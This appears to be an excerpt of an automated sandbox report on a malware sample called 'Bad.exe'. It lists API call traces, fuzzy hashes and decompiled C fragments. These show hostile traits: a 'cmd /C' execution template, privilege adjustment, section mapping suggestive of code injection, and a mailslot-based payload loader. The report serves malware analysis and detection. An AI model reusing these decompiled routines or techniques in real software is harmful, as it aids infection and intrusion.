    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:B58623B61A3D254FB9FF47FF0A4A74C6
Total matches:152
Initial Analysis Report:Open
Initial sample Analysis ID:66839
Initial sample SHA 256:20CE262F54448C1424662B74706D81FAB421EB8F550C39A18CDB89DD9F15CB07
Initial sample name:Bad.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
